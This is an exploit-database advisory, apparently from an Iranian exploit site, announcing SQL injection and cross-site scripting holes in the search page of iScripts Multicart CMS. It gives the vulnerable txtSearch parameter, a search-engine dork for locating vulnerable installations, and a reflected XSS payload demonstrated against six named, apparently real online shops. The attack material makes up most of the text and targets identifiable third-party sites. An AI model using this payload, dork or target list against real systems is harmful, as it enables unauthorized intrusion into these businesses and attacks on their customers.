Sql And Xss Vulnerability In iScripts Multicart Cms All Version ################################# # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@ # ##################################### ##################################### # Iranian Exploit DataBase # iScripts Multicart Cms Multiple Vulnerability # Vendor site : http://www.iscripts.com/multicart/ # Dork : "Powered by iScripts Multicart" # Author : IeDb # Site : Www.IeDb.Ir - xssed.Ir # Vulnerability attack information site : http://xssed.Ir/ ##################################### Bug : http://www.site.com/search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch=[Xss][sql] Dem0 : http://www.farmdrop.org/shop/search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script> http://artisanfantasy.com/search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script> http://flowergardeners.com/Shop/search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script> https://www.totalboxshop.tv/uk/search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script> http://www.youneik.com/search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script> http://www.lilhalfpintshop.com/search.php?chkProductName=on&chkIncludeSubcategories=on&sd=1&txtSearch='"><script>alert(/iedb.ir/)</script> ##################################### # Archive Exploit = http://iedb.ir/exploits-4281.html #####################################
